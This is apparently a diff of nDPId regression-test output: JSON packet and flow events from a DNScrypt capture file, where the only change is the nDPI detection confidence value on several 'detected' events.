AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":500,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":48237,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":500,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":48237,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection 
failed","datalink":1,"packet_id":501,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739396047} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":501,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739396047,"pkt":"REREREREZmZmZmZmCABFAABQlEQAuX4R66QKAAABkFtq4wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":502,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":54305,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":502,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":1,"flow_last_seen":946739396047,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739396047,"pkt":"REREREREZmZmZmZmCABFAAIclEVAAH4RqpAKAAABkFtq49QhAbsCCL4UZloBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdANvbmUAABAAAQAAAAAAAAAAAAHHAAwBwwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":502,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":54305,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":502,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":54305,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":503,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":55469,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":503,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":1,"flow_last_seen":946739396047,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739396047,"pkt":"REREREREZmZmZmZmCABFAAIclEZAAH4Rqo8KAAABkFtq49itAbsCCL4UZlwBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdANvbmUAABAAAQAAAAAAAAAAAAHHAAwBwwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":503,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":55469,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":503,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":55469,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":504,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":54204,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":504,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":204,"flow_packet_id":1,"flow_last_seen":946739396047,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739396047,"pkt":"REREREREZmZmZmZmCABFAAXclEcgAH4Rxs4KAAABkFtq49O8AbsGBCzXZl0BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdANvbmUAABAAAQAAAAAAAAAAAAXDAAwFvwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":504,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":54204,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":504,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":54204,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection 
failed","datalink":1,"packet_id":505,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739396047} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":505,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739396047,"pkt":"REREREREZmZmZmZmCABFAABQlEcAuX4R66EKAAABkFtq4wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":2,"flow_last_seen":946739396069,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":946739396069,"pkt":"ZmZmZmZmRERERERECABFAADTkQZAADcR9hiQW2rjCgAAAQG7oJQAvzbjZluBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdANvbmUAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAALkTa3PmYOnbKVsenPA+dUbqb7bPdeethm+r51VaewMcP0sfe1RtTAHcc8Uvs8bFQylZgA4Na3Yk4xgl2KWmKw4bPctGhBgarq2J2ya3ifLfvYsxbqqez8iaBEin48TCXxs9y0aEGBquAAAAAV9TgfdfVNN3"} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":507,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":33293,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":205,"flow_packet_id":1,"flow_last_seen":946739396070,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739396070,"pkt":"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"} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":507,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":33293,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":507,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":33293,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":508,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":38242,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":508,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":206,"flow_packet_id":1,"flow_last_seen":946739396070,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739396070,"pkt":"REREREREZmZmZmZmCABFAAXcSFkgAH4RFuEKAAABLuPIN5ViIPsGBDRUFdABAAABAAAAAAABATINZG5zY3J5cHQtY2VydARyZG5zBmZhZWxpeANuZXQAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":508,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":38242,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":508,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":38242,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 